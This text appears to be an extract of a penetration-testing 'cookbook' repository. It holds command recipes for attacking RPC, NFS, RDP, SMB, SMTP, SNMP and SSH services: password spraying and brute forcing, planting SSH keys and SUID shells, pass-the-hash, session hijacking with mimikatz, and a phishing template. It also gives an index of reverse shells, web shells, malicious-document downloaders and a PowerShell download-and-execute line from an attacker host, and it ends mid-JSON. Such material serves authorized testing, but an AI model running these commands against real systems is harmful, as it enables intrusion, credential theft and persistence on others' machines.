rpcclient $> querydominfo
`` Domain users, groups, shares, privileges
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> querygroup VAR_RID
rpcclient $> querygroupmem VAR_RID
rpcclient $> queryuser VAR_RID
rpcclient $> netshareenum
rpcclient $> netshareenumall
rpcclient $> enumprivs
`` Reset domain user password
rpcclient $> setuserinfo2 VAR_USERNAME 23 'VAR_PASSWORD'
~$ net rpc password administrator -U VAR_USERNAME -S VAR_TARGET_HOST
`` Check domain password policy
rpcclient $> getdompwinfo
rpcclient $> getusrdompwinfo VAR_RID
`` Password spraying
~$ rpcclient -U "VAR_USERNAME%VAR_PASSWORD" -c "getusername;quit" VAR_TARGET_HOST
-- Snippet
VAR_PASSWORD=Passw0rd
VAR_TARGET_HOST=10.0.0.1
for user in `cat domain-users.txt`; do
echo -n "$user:$VAR_PASSWORD" && rpcclient -U "$user:$VAR_PASSWORD" -c "getusername;quit" $VAR_TARGET_HOST
done
================================================
FILE: Target.Host.Service.NFS.txt
================================================
`` Scanning for accessible exports
~$ nmap -v -n -p 111 --script nfs-ls VAR_TARGET_NETWORK
`` General
~$ showmount -e VAR_TARGET_HOST
`` Mounting
`` Anonymous
~$ mount -t nfs VAR_TARGET_HOST:/secret /tmp/remote_dir
`` NFS #1
~$ mount -t nfs VAR_TARGET_HOST:/secret /mnt/share/
~$ cat ~/.ssh/id_rsa.pub >> /mnt/share/root/.ssh/authorized_keys
~$ umount /mnt/share
~$ ssh root@VAR_TARGET_HOST
`` NFS #2
~$ cat /etc/exports
~$ mkdir /tmp/.tmp
~$ mount -t nfs VAR_TARGET_HOST:/tmp /tmp/.tmp
~$ ls -lah /tmp/.tmp
~$ gcc -o /tmp/.tmp/shell shell.c
~$ root@kali:/tmp/.tmp# chown root:root shell
~$ root@kali:/tmp/.tmp# chmod +s shell
`` I/O Error?
~$ mount -t nfs -o nfsvers=2 VAR_TARGET_HOST:/secret /tmp/remote_dir
================================================
FILE: Target.Host.Service.POP3.txt
================================================
`` Password Bruteforcing
~$ nmap -n -v -p 995 --script pop3-brute --script-args=vulns.showall VAR_TARGET_HOST
~$ hydra -I -l VAR_USERNAME -e nsr -P VAR_WORDLIST_PASSWORD -f -V pop3://VAR_TARGET_HOST
~$ hydra -I -C VAR_WORDLIST_COMBO -e nsr -t 10 -V pop3://VAR_TARGET_HOST
================================================
FILE: Target.Host.Service.RDP.txt
================================================
`` Scanning
~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST
`` Connection
~$ rdesktop -u guest -p guest VAR_TARGET_HOST -g 85%
~$ rdesktop -u VAR_USERNAME -p VAR_PASSWORD -g 85% -r disk:share=/root/ VAR_TARGET_HOST
`` PTH
-- PTH available for Windows 2012 R2 and Windows 8.1
~$ xfreerdp /u:VAR_USERNAME /d:VAR_DOMAIN /pth:VAR_NT_HASH /v:VAR_TARGET_HOST
`` Password Bruteforcing
~$ hydra -V -t 1 -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD rdp://VAR_TARGET_HOST
~$ ncrack -vv --pairwise -U ../usernames.txt -P ../passwords.txt -f --stealthy-linear rdp://VAR_TARGET_HOST
`` Hijacking disconnected sessions
`` Using service
~> query user
-- grab session names or IDs
~> sc.exe create VAR_STRING binpath= "cmd.exe /k tscon 2 /dest:rdp-tcp#1" type= own
~> sc.exe start VAR_STRING
~> sc.exe delete VAR_STRING
`` Using mimikatz
~> mimikatz
mimikatz # ts::sessions
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # ts::remote /id:2
================================================
FILE: Target.Host.Service.RPC.txt
================================================
`` Scanning
~$ rpcinfo -p VAR_TARGET_HOST
~$ nmap --script rpcinfo --script-args=unsafe=1 -p VAR_TARGET_PORT VAR_TARGET_HOST
~$ nmap --script rpc-grind --script-args 'rpc-grind.threads=8' -p VAR_TARGET_PORT VAR_TARGET_HOST
================================================
FILE: Target.Host.Service.SMB.txt
================================================
`` Check remote target access
~> net use \\VAR_TARGET_HOST\C$
~> dir \\VAR_TARGET_HOST\C$
`` Enumeration
-- NetBIOS information
~$ nbtscan -vh VAR_TARGET_HOST
-- Version if anything else fails
~$ smbver.sh
-- Check for permissions first
~$ smbmap -H VAR_TARGET_HOST
-- Anything more?
~$ enum4linux -a VAR_TARGET_HOST
-- Null session allowed?
~$ smbclient -N -L VAR_TARGET_HOST
~> net use \\VAR_TARGET_HOST\IPC$ "" /u:""
-- Passwordless admin?
~$ smbclient //VAR_TARGET_HOST/ipc$ -U Administrator
`` Vulnerability scanning
~$ nmap -v -n -p 139,445 -sS -g 53 --script=smb-double-pulsar-backdoor,"smb-enum-*",smb-ls,smb-mbenum,smb-enum-users,smb-os-discovery,smb-print-text,smb-psexec,smb-security-mode,smb-server-stats,"smb-vuln-*","smb2-*" --script-args=vulns.showall --script-args=unsafe=1 VAR_TARGET_HOST
`` Shares listing
~> net view \\VAR_TARGET_HOST /all
~$ smbmap -u VAR_USERNAME -p VAR_PASSWORD -H VAR_TARGET_HOST
~$ nmap --script smb-enum-shares -p139,445 -v -n --open VAR_TARGET_HOST
~$ smbclient -U "VAR_USERNAME%VAR_PASSWORD" \\\\VAR_DOMAIN\SYSVOL
`` Share mount
~$ mount -t cifs //VAR_TARGET_HOST/share /mnt/tmp -o,username=VAR_TARGET_DOMAIN/VAR_USERNAME,password=VAR_PASSWORD,vers=2.0
# SMBv2
`` Various
~$ nbtscan -r VAR_TARGET_HOST
~$ smbclient //VAR_TARGET_HOST/ipc$
~$ smbclient //VAR_TARGET_HOST/admin$
~$ smbclient -W VAR_TARGET_DOMAIN -U user -L VAR_TARGET_HOST
~$ proxychains smbclient '//VAR_TARGET_HOST/C$' -U 'VAR_TARGET_DOMAIN/VAR_USERNAME%VAR_PASSWORD'
`` Recursive download
~$ smbclient -N //VAR_TARGET_HOST/C$
smb: \> mask ""
smb: \> prompt
smb: \> recurse
smb: \> mget Users
================================================
FILE: Target.Host.Service.SMTP.txt
================================================
`` Scanning
~$ nmap --script smtp-commands,smtp-enum-users -vv -sV -Pn -p 25 VAR_TARGET_HOST
`` Testing
~$ swaks --to user@VAR_TARGET_HOST --from user@example.com --server VAR_TARGET_HOST:25 --body "Some text" --header "Subject: Important"
`` Password Bruteforcing
~$ hydra -I -P VAR_WORDLIST -V smtp://VAR_TARGET_HOST
`` User enumeration
~$ nc -nv VAR_TARGET_HOST 25
VRFY VAR_USERNAME
~$ smtp-user-enum -M VRFY -U /usr/share/wordlists/metasploit/unix_users.txt -t VAR_TARGET_HOST
~$ hydra smtp-enum://VAR_TARGET_HOST/vrfy -l VAR_USERNAME -p localhost
`` Phishing with swaks (HTML template)
swaks --from sender@example.com --h-From: '=?utf-8?B?VAR_BASE64_VALUE?= <sender@example.com>' --to receiver@example.com,bcc@example.com --h-To: '"ASCII without encoding" <receiver@example.com>' --server VAR_TARGET_HOST:25 --attach-type "text/html;charset=utf-8" --attach-body body.html --header "Subject: =?utf-8?B?VAR_BASE64_VALUE?=" --attach-type "image/png" --attach logo.png
================================================
FILE: Target.Host.Service.SNMP.txt
================================================
`` Scanning
`` Network discovery
~$ nmap -sU -sV -p 161 VAR_TARGET_RANGE
~$ onesixtyone -s -o VAR_FILENAME VAR_TARGET_CIDR
~$ onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp.txt VAR_TARGET_HOST
~$ hydra -P /usr/share/seclists/Discovery/SNMP/snmp.txt -V VAR_TARGET_HOST snmp
`` Basic
~$ nmap -v -sV -Pn -sU -p 161,162 --script snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users VAR_TARGET_HOST
`` Extended
~$ python ./snmpbrute.py -t VAR_TARGET_HOST -f /usr/share/seclists/Discovery/SNMP/snmp.txt
~$ xprobe2 -v -p udp:161:open VAR_TARGET_HOST
~$ snmp-check VAR_TARGET_HOST -c public
`` FTP Bounce scanning
~$ nmap VAR_TARGET_HOST -b VAR_FTP_HOST -Pn -n -g 88 -v -sU -p 161,162 --script snmp-netstat,snmp-processes
`` Network range
#!/bin/bash
for ip in $(cat ip_list.txt); do
echo $ip;
for str in $(cat /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings_onesixtyone.txt); do
if snmpwalk -OsS -v 1 -c $str $ip > $ip.snmpwalk; then
break
fi
done;
done
`` Table
- 1.3.6.1.2.1.25.1.6.0 - System Processes
- 1.3.6.1.2.1.25.2.3.1.4 - Storage Units
- 1.3.6.1.2.1.25.4.2.1.2 - Running Programs
- 1.3.6.1.2.1.25.4.2.1.4 - Processes Path
- 1.3.6.1.2.1.25.6.3.1.2 - Software Name
- 1.3.6.1.2.1.6.13.1.3 - TCP Local Ports
- 1.3.6.1.4.1.77.1.2.25 - User Accounts
`` Community strings
- /usr/share/wordlists/fasttrack.txt
`` Community string bruteforcing
~$ nmap -sU VAR_TARGET_HOST -p 161 --script snmp-brute -Pn --script-args snmp-brute.communitiesdb=/usr/share/wordlists/fasttrack.txt
~$ onesixtyone -c /usr/share/wordlists/dirb/small.txt VAR_TARGET_HOST
~$ for i in $(cat /usr/share/wordlists/metasploit/unix_users.txt);do snmpwalk -v 1 -c $i VAR_TARGET_HOST;done| grep -v "Timeout"
~$ echo public > community-strings.txt
~$ echo private >> community-strings.txt
~$ echo manager >> community-strings.txt
~$ for ip in $(seq 1 254);do echo VAR_TARGET_HOST_BASE.$ip;done > ips
~$ onesixtyone -c community-strings.txt -i ips
~$ hydra -P password-file.txt -V VAR_TARGET_HOST snmp
`` Community string checks
~$ snmp-check VAR_TARGET_HOST -c public
~$ snmpget -v 1 -c public VAR_TARGET_HOST
~$ snmpwalk -v 1 -c public VAR_TARGET_HOST
~$ snmpbulkwalk -v2c -c public -Cn0 -Cr10 VAR_TARGET_HOST
`` Windows users
~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.25
`` Running processes
~$ snmpwalk -c public -v1 VAR_TARGET_HOST P 1.3.6.1.2.1.25.4.2.1.2
`` Open TCP ports
~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.6.13.1.3
`` Installed software
~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.2.1.25.6.3.1.2
`` Shares
~$ snmpwalk -c public -v1 VAR_TARGET_HOST 1.3.6.1.4.1.77.1.2.3.1.1
`` Password Bruteforcing
~$ hydra -P VAR_WORDLIST -V VAR_TARGET_HOST snmp
================================================
FILE: Target.Host.Service.SSH.txt
================================================
`` Scanning
~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR_TARGET_HOST
`` Generate public key from private
~$ ssh-keygen -f id_rsa -y > id_rsa.pub
`` Password Bruteforcing
-- Verbose (-V), ignore previous results (-I), quit if matches (-F)
-- Default port
~$ hydra -V -I -F -L VAR_WORDLIST_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST
-- Maximum wait 80, wait between 3, wait 1 per login attempt
~$ hydra -V -I -F -t 1 -w 80 -c 1 -W 3 -f -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -e nsr ssh://VAR_TARGET_HOST
-- Use single username and non-default port
~$ hydra -V -I -F -l VAR_USERNAME -P VAR_WORDLIST_PASSWORD -s VAR_TARGET_PORT -e nsr ssh://VAR_TARGET_HOST
gitextract_leidmqwb/
├── .gitignore
├── Notes.Checklist.txt
├── Notes.Exploits.txt
├── Notes.Helpers.txt
├── Notes.Wordlists.txt
├── README.md
├── Target.Host.OS.Linux.txt
├── Target.Host.OS.Shells.txt
├── Target.Host.OS.Windows.txt
├── Target.Host.Service.AD.txt
├── Target.Host.Service.AMQP.txt
├── Target.Host.Service.DB.MSSQL.txt
├── Target.Host.Service.DB.MySQL.txt
├── Target.Host.Service.DB.PostgreSQL.txt
├── Target.Host.Service.FTP.txt
├── Target.Host.Service.HTTP.txt
├── Target.Host.Service.IDENT.txt
├── Target.Host.Service.LDAP.txt
├── Target.Host.Service.MSRPC.txt
├── Target.Host.Service.NFS.txt
├── Target.Host.Service.POP3.txt
├── Target.Host.Service.RDP.txt
├── Target.Host.Service.RPC.txt
├── Target.Host.Service.SMB.txt
├── Target.Host.Service.SMTP.txt
├── Target.Host.Service.SNMP.txt
├── Target.Host.Service.SSH.txt
├── Target.Host.Service.TELNET.txt
├── Target.Host.Service.VNC.txt
├── Target.Host.Service.X11.txt
├── Target.Network.Pivoting.txt
├── Target.Network.Scanning.txt
├── Target.Network.Wireless.txt
├── Target.Recon.DNS.txt
├── Target.Recon.Dorks.txt
├── Target.Recon.OSINT.txt
├── bin/
│ ├── direnum_combo.sh
│ ├── dns_cnames.sh
│ ├── dns_resolve.sh
│ ├── dns_transfer.sh
│ ├── download_files.sh
│ ├── download_int.sh
│ ├── ftp_server.py
│ ├── hexdecode.py
│ ├── hexreverse.py
│ ├── http_codes.sh
│ ├── httpd.py
│ ├── mac_oui.sh
│ ├── mitm_toolkit.py
│ ├── parse_gnmap.sh
│ ├── ping.py
│ ├── ping.sh
│ ├── quote.py
│ ├── scan_top.sh
│ ├── snmp_enum.sh
│ ├── snmp_public_hosts.sh
│ ├── ssh_enum_malform.py
│ ├── ssh_enum_time.py
│ ├── tomcat_brute.py
│ ├── vba_format.py
│ ├── vbe_decoder.py
│ └── xor.py
└── snippets/
├── html/
│ └── smuggling.html
├── java/
│ ├── shells/
│ │ ├── reverse/
│ │ │ ├── reverse.jsp
│ │ │ ├── reverse_bash.java
│ │ │ └── reverse_php.java
│ │ └── web/
│ │ └── webshell.jsp
│ └── utils/
│ └── jenkins_console.groovy
├── linux/
│ ├── backdoors/
│ │ ├── ssh_reconnect.sh
│ │ ├── suid_popen.c
│ │ └── suid_shell.c
│ ├── maldocs/
│ │ └── runner-1.c
│ ├── shells/
│ │ ├── bind/
│ │ │ └── udp.sh
│ │ └── reverse/
│ │ ├── reverse.c
│ │ └── reverse.pl
│ └── utils/
│ ├── bruteforce.sh
│ ├── ld_preload.c
│ ├── persistence.py
│ ├── port_scanning1.sh
│ ├── ps_monitoring.sh
│ ├── python_pickle.py
│ └── so_injection.c
├── php/
│ └── recursive_dir.php
├── python/
│ └── port_scanning.py
├── windows/
│ ├── maldocs/
│ │ ├── downloader-1.cs
│ │ ├── downloader-1.js
│ │ ├── downloader-1.ps1
│ │ ├── downloader-1.vba
│ │ ├── downloader-1.vbs
│ │ ├── downloader-1.xls
│ │ ├── downloader-2.js
│ │ ├── downloader-2.vba
│ │ ├── evasion-1.cs
│ │ ├── evasion-1.hta
│ │ ├── evasion-1.inf
│ │ ├── evasion-1.sct
│ │ ├── evasion-1.url
│ │ ├── evasion-1.wsf
│ │ ├── evasion-2.hta
│ │ ├── evasion-2.inf
│ │ ├── evasion-2.sct
│ │ ├── evasion-msxml.xml
│ │ ├── evasion-msxml.xsl
│ │ ├── ntlm-1.url
│ │ ├── ntlm-evasion-mssql-1.csproj
│ │ ├── runner-1.cs
│ │ ├── runner-1.ps1
│ │ └── runner-1.vba
│ ├── shells/
│ │ ├── bind/
│ │ │ ├── PortListener.ps1
│ │ │ ├── web1.asp
│ │ │ ├── web2.asp
│ │ │ ├── web3.asp
│ │ │ └── web4.aspx
│ │ └── reverse/
│ │ ├── reverse1.bat
│ │ ├── reverse1.cpp
│ │ ├── reverse1.cs
│ │ ├── reverse1.ps1
│ │ ├── reverse2.cpp
│ │ ├── reverse2.ps1
│ │ └── reverse_dll.c
│ └── utils/
│ ├── DomainPasswordSpray.ps1
│ ├── Enable-Privilege.ps1
│ ├── GrabAndRun.ps1
│ ├── Invoke-Mimikatz-latest.ps1
│ ├── PortScanning.ps1
│ ├── Self-Elevate.ps1
│ ├── SharingIsCaring.ps1
│ ├── Start-WebServer.ps1
│ ├── SuperPing.ps1
│ ├── Win10FirewallRules.ps1
│ ├── WindowsEnum.ps1
│ ├── base64.vbs
│ ├── ftp.bat
│ ├── icacls.bat
│ ├── info.aspx
│ ├── mimikatz-Invoke-Mimikatz-obfuscate.sh
│ ├── mimikatz-clone-obfuscated.sh
│ ├── minidump.cs
│ ├── run_bat.c
│ ├── run_dll1.c
│ ├── run_dll2.cpp
│ ├── runas1.bat
│ ├── runas2.bat
│ ├── schcheck.bat
│ ├── tcpwrecovery.py
│ ├── update_invoke_mimikatz.py
│ ├── useradd.c
│ ├── wget_ps1.bat
│ ├── wget_vbs.bat
│ └── winscppassword.py
└── xml/
└── xee.txt
SYMBOL INDEX (114 symbols across 30 files)
FILE: bin/httpd.py
class FileHandler (line 24) | class FileHandler(server.BaseHTTPRequestHandler):
method __init__ (line 26) | def __init__(self, *args, **kwargs):
method send_headers (line 30) | def send_headers(self, content_type='text/html'):
method get_temp_filename (line 36) | def get_temp_filename(self, client_host):
method get_path_filename (line 45) | def get_path_filename(self):
method get_client_address (line 48) | def get_client_address(self):
method do_GET (line 51) | def do_GET(self):
method do_POST (line 64) | def do_POST(self):
class HTTPServerV6 (line 90) | class HTTPServerV6(server.HTTPServer):
FILE: bin/mitm_toolkit.py
class ToolkitBase (line 6) | class ToolkitBase:
method __init__ (line 8) | def __init__(self):
class HTML (line 12) | class HTML(ToolkitBase):
method load (line 14) | def load(self, loader):
method response (line 22) | def response(self, flow):
class NTLM (line 32) | class NTLM(ToolkitBase):
method load (line 34) | def load(self, loader):
method response (line 42) | def response(self, flow):
class Exec (line 57) | class Exec(ToolkitBase):
method load (line 59) | def load(self, loader):
method request (line 67) | def request(self, flow):
FILE: bin/ping.py
function scan (line 12) | def scan(ip, timeout, ttl):
function run (line 27) | def run(ip_range, timeout, randomize, ttl, workers):
FILE: bin/ssh_enum_malform.py
class BadUsername (line 44) | class BadUsername(Exception):
method __init__ (line 47) | def __init__(self):
function add_boolean (line 51) | def add_boolean(*args, **kwargs):
function call_error (line 56) | def call_error(*args, **kwargs):
function malform_packet (line 61) | def malform_packet(*args, **kwargs):
function checkUsername (line 72) | def checkUsername(username, tried=0):
function checkVulnerable (line 98) | def checkVulnerable():
function exportJSON (line 108) | def exportJSON(results):
function exportCSV (line 118) | def exportCSV(results):
function exportList (line 125) | def exportList(results):
function main (line 154) | def main():
FILE: bin/ssh_enum_time.py
class bcolors (line 32) | class bcolors:
function get_args (line 43) | def get_args():
function get_banner (line 59) | def get_banner(host, port):
function connect (line 70) | def connect(host, port, user):
function main (line 87) | def main():
FILE: bin/vba_format.py
function vb_wrap (line 6) | def vb_wrap(val):
function run (line 13) | def run(body, line_length):
FILE: bin/vbe_decoder.py
function decode_data (line 28) | def decode_data(data: str):
function fatal_error (line 60) | def fatal_error(message: str):
function success (line 68) | def success(message: str):
function validate_files (line 75) | def validate_files(files: list):
function decode_files (line 86) | def decode_files(files: list):
function decode_file (line 94) | def decode_file(file):
function main (line 112) | def main():
FILE: bin/xor.py
class Convert (line 7) | class Convert:
class XOR (line 12) | class XOR(Convert):
method __init__ (line 14) | def __init__(self, data, is_list):
method to_dec (line 17) | def to_dec(self, val):
method to_hex (line 20) | def to_hex(self, val):
method parse (line 23) | def parse(self, val, is_list):
method convert (line 32) | def convert(self, key):
function run (line 45) | def run(data, key, is_list, truncate, output):
FILE: snippets/linux/backdoors/suid_popen.c
function main (line 7) | int main(void)
FILE: snippets/linux/backdoors/suid_shell.c
function main (line 7) | int main(void)
FILE: snippets/linux/maldocs/runner-1.c
function main (line 9) | int main(int argc, char ** argv) {
FILE: snippets/linux/shells/reverse/reverse.c
function main (line 11) | int main(int argc, char *argv[])
FILE: snippets/linux/utils/ld_preload.c
function _init (line 7) | void _init() {
FILE: snippets/linux/utils/python_pickle.py
class Payload (line 8) | class Payload():
method __reduce__ (line 10) | def __reduce__(self):
FILE: snippets/linux/utils/so_injection.c
function inject (line 8) | void inject(){
FILE: snippets/php/recursive_dir.php
function list_files (line 8) | function list_files($path=".") {
FILE: snippets/windows/maldocs/downloader-1.cs
class Program (line 12) | class Program {
method OpenProcess (line 14) | [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)]
method VirtualAllocEx (line 16) | [DllImport("kernel32.dll", SetLastError=true, ExactSpelling=true)]
method WriteProcessMemory (line 18) | [DllImport("kernel32.dll")]
method CreateRemoteThread (line 20) | [DllImport("kernel32.dll")]
method GetProcAddress (line 22) | [DllImport("kernel32", CharSet=CharSet.Ansi, ExactSpelling=true, SetLa...
method GetModuleHandle (line 24) | [DllImport("kernel32.dll", CharSet=CharSet.Auto)]
method Main (line 27) | static void Main(string[] args)
FILE: snippets/windows/maldocs/evasion-1.cs
class Program (line 10) | class Program
method Main (line 13) | static void Main(string[] args)
class Sample (line 19) | [System.ComponentModel.RunInstaller(true)]
method Uninstall (line 23) | public override void Uninstall(System.Collections.IDictionary savedState)
FILE: snippets/windows/maldocs/runner-1.cs
class Program (line 12) | class Program {
method VirtualAlloc (line 14) | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
method CreateThread (line 16) | [DllImport("kernel32.dll")]
method WaitForSingleObject (line 18) | [DllImport("kernel32.dll")]
method Main (line 21) | static void Main(string[] args)
FILE: snippets/windows/shells/reverse/reverse1.cpp
function RunShell (line 9) | void RunShell(char* C2Server, int C2Port) {
function main (line 61) | int main(int argc, char **argv) {
FILE: snippets/windows/shells/reverse/reverse1.cs
class Program (line 12) | public class Program
method Main (line 15) | public static void Main(string[] args)
method CmdOutputDataHandler (line 46) | private static void CmdOutputDataHandler(object sendingProcess, DataRe...
FILE: snippets/windows/shells/reverse/reverse2.cpp
function LaunchFreddy (line 14) | void LaunchFreddy(char* place, int shipment) {
function main (line 70) | int main(int argc, char **argv) {
FILE: snippets/windows/shells/reverse/reverse_dll.c
type sockaddr_in (line 13) | struct sockaddr_in
function executepayload (line 17) | void executepayload(void)
function BOOL (line 36) | BOOL APIENTRY DllMain(HMODULE hModule,
FILE: snippets/windows/utils/minidump.cs
class Program (line 7) | class Program {
method MiniDumpWriteDump (line 9) | [DllImport("Dbghelp.dll")]
method OpenProcess (line 11) | [DllImport("kernel32.dll")]
method Main (line 14) | static void Main(string[] args) {
FILE: snippets/windows/utils/run_bat.c
function main (line 5) | int main ()
FILE: snippets/windows/utils/run_dll1.c
function BOOL (line 6) | BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
FILE: snippets/windows/utils/run_dll2.cpp
function fileExist (line 6) | int fileExist(LPCTSTR file) {
function scriptExec (line 23) | void scriptExec(void) {
function BOOL (line 46) | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID ...
function main (line 63) | __declspec(dllexport) int main() {
FILE: snippets/windows/utils/tcpwrecovery.py
function process_file (line 14) | def process_file(filename):
function search_ini (line 31) | def search_ini():
function tc_random (line 42) | def tc_random(nMax):
function tc_shift (line 47) | def tc_shift(n1, n2):
function tc_decrypt (line 50) | def tc_decrypt(pwd):
function main (line 81) | def main():
FILE: snippets/windows/utils/useradd.c
function main (line 5) | int main ()
FILE: snippets/windows/utils/winscppassword.py
function simple_encrypt_char (line 19) | def simple_encrypt_char(char):
function simple_decrypt_next_char (line 26) | def simple_decrypt_next_char(password_list):
function encrypt_password (line 34) | def encrypt_password(password, key):
function decrypt_password (line 57) | def decrypt_password(password, key):
function get_value (line 83) | def get_value(session_key, str):
function get_password (line 91) | def get_password():
Condensed preview — 151 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (3,175K chars).
[
{
"path": ".gitignore",
"chars": 10,
"preview": ".DS_Store\n"
},
{
"path": "Notes.Checklist.txt",
"chars": 7191,
"preview": "-- Source: https://github.com/0xRadi/OWASP-Web-Checklist\n\n`` Steps\n\n - Malware Injection (Spear-Phish, Web Exploits, "
},
{
"path": "Notes.Exploits.txt",
"chars": 5102,
"preview": "`` Fuzzing\n\n # TODO: Upload phazz sources\n\n ~$ phazz.py fuzz -h VAR_TARGET_HOST -p 69 -n 100 -l 3000 -s tftp:read "
},
{
"path": "Notes.Helpers.txt",
"chars": 40281,
"preview": "`` Compression\n\n ~$ 7z a -t7z -m0=lzma2 -mx=9 -mfb=64 -md=32m -ms=on -mhe=on -p archive.7z ./directory/\n\n`` Convert r"
},
{
"path": "Notes.Wordlists.txt",
"chars": 2481,
"preview": "`` Passwords\n\n `` Fast bruteforcing with typical combinations and top lists\n\n - ~/lib/brutas/brutas-passwords-"
},
{
"path": "README.md",
"chars": 1882,
"preview": "# pentesting-cookbook\n\n> A set of recipes useful in pentesting and red teaming scenarios\n\nSnippets, code samples and hin"
},
{
"path": "Target.Host.OS.Linux.txt",
"chars": 13897,
"preview": "`` Initial\n\n `` Upgrade\n\n ~$ python -c \"import pty; pty.spawn('/bin/bash')\"\n -- Don't forget Python 3.x"
},
{
"path": "Target.Host.OS.Shells.txt",
"chars": 9085,
"preview": "`` Linux\n\n @ snippets/linux/shells/\n\n`` Windows\n\n @ snippets/windows/shells/\n\n`` Shell\n\n ~$ nohup /bin/bash -i "
},
{
"path": "Target.Host.OS.Windows.txt",
"chars": 61171,
"preview": "`` Enumeration\n\n `` Automated\n\n -- Easily detected by AV without patching\n ~> seatbelt.exe all full > r"
},
{
"path": "Target.Host.Service.AD.txt",
"chars": 13042,
"preview": "`` Helpers\n\n `` Powerview\n\n ~PS> IEX(New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST"
},
{
"path": "Target.Host.Service.AMQP.txt",
"chars": 76,
"preview": "`` RabbitMQ\n\n ~$ nmap -Pn -sV -p 5672 --script amqp-info VAR_TARGET_HOST\n"
},
{
"path": "Target.Host.Service.DB.MSSQL.txt",
"chars": 5250,
"preview": "`` Scanning\n\n ~$ nmap VAR_TARGET_HOST -v -p 1433 -sV -Pn -vv --script ms-sql-info,ms-sql-ntlm-info,ms-sql-empty-passw"
},
{
"path": "Target.Host.Service.DB.MySQL.txt",
"chars": 3291,
"preview": "`` Scanning\n\n ~$ nmap -p 3306 -sV -Pn -vv --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password"
},
{
"path": "Target.Host.Service.DB.PostgreSQL.txt",
"chars": 466,
"preview": "`` Scanning\n\n ~$ nmap VAR_TARGET_HOST -v -p 5432 -sV -Pn -vv\n\n`` Password Bruteforcing\n\n ~$ nmap -p 5432 --script "
},
{
"path": "Target.Host.Service.FTP.txt",
"chars": 522,
"preview": "`` Scanning\n\n ~$ nmap -n -v -p 21 --script ftp-anon,ftp-syst VAR_TARGET_HOST\n\n`` Password Bruteforcing\n\n ~$ nmap -"
},
{
"path": "Target.Host.Service.HTTP.txt",
"chars": 21842,
"preview": "`` Initial\n\n `` nikto\n\n `` Less defaults, less intense, no dictionary\n\n ~$ nikto -h http://VAR_TARG"
},
{
"path": "Target.Host.Service.IDENT.txt",
"chars": 82,
"preview": "`` User enumeration\n\n ~$ nmap -n -v -p 113 --script auth-owners VAR_TARGET_HOST"
},
{
"path": "Target.Host.Service.LDAP.txt",
"chars": 292,
"preview": "`` Scanning\n\n `` Anonymous\n\n ~$ ldapsearch -h VAR_TARGET_HOST -p 389 -x -b \"dc=VAR_DOMAIN,dc=com\"\n LDAP"
},
{
"path": "Target.Host.Service.MSRPC.txt",
"chars": 1310,
"preview": "`` Scanning\n\n ~$ nmap -n -v -sV -Pn -p135 --script msrpc-enum --script-args vulns.showall VAR_TARGET_HOST\n\n`` Connect"
},
{
"path": "Target.Host.Service.NFS.txt",
"chars": 849,
"preview": "`` Scanning for accessible exports\n\n ~$ nmap -v -n -p 111 --script nfs-ls VAR_TARGET_NETWORK\n\n`` General\n\n ~$ show"
},
{
"path": "Target.Host.Service.POP3.txt",
"chars": 285,
"preview": "`` Password Bruteforcing\n\n ~$ nmap -n -v -p 995 --script pop3-brute --script-args=vulns.showall VAR_TARGET_HOST\n ~"
},
{
"path": "Target.Host.Service.RDP.txt",
"chars": 1083,
"preview": "`` Scanning\n\n ~$ nmap --script rdp-enum-encryption,rdp-ntlm-info VAR_TARGET_HOST\n\n`` Connection\n\n ~$ rdesktop -u g"
},
{
"path": "Target.Host.Service.RPC.txt",
"chars": 236,
"preview": "`` Scanning\n\n ~$ rpcinfo -p VAR_TARGET_HOST\n ~$ nmap --script rpcinfo --script-args=unsafe=1 -p VAR_TARGET_PORT VA"
},
{
"path": "Target.Host.Service.SMB.txt",
"chars": 1753,
"preview": "`` Check remote target access\n\n ~> net use \\\\VAR_TARGET_HOST\\C$\n ~> dir \\\\VAR_TARGET_HOST\\C$\n\n`` Enumeration\n\n "
},
{
"path": "Target.Host.Service.SMTP.txt",
"chars": 1012,
"preview": "`` Scanning\n\n ~$ nmap --script smtp-commands,smtp-enum-users -vv -sV -Pn -p 25 VAR_TARGET_HOST\n\n`` Testing\n\n ~$ sw"
},
{
"path": "Target.Host.Service.SNMP.txt",
"chars": 3160,
"preview": "`` Scanning\n\n `` Network discovery\n\n ~$ nmap -sU -sV -p 161 VAR_TARGET_RANGE\n ~$ onesixtyone -s -o VAR_"
},
{
"path": "Target.Host.Service.SSH.txt",
"chars": 1673,
"preview": "`` Scanning\n\n ~$ nmap -p 22 --script ssh-enum-algos,ssh-auth-methods,ssh-hostkey,ssh-publickey-acceptance,ssh-run VAR"
},
{
"path": "Target.Host.Service.TELNET.txt",
"chars": 415,
"preview": "`` Scanning\n\n ~$ nmap -v -n -p 23 VAR_TARGET_NETWORK\n\n`` Password Bruteforcing\n\n ~$ nmap -n -v -p 23 --script teln"
},
{
"path": "Target.Host.Service.VNC.txt",
"chars": 161,
"preview": "`` Password Bruteforcing\n\n ~$ hydra -s 5900 -P VAR_WORDLIST -V -t 8 VAR_TARGET_HOST vnc\n\n ~$ crowbar.py -b vnckey "
},
{
"path": "Target.Host.Service.X11.txt",
"chars": 553,
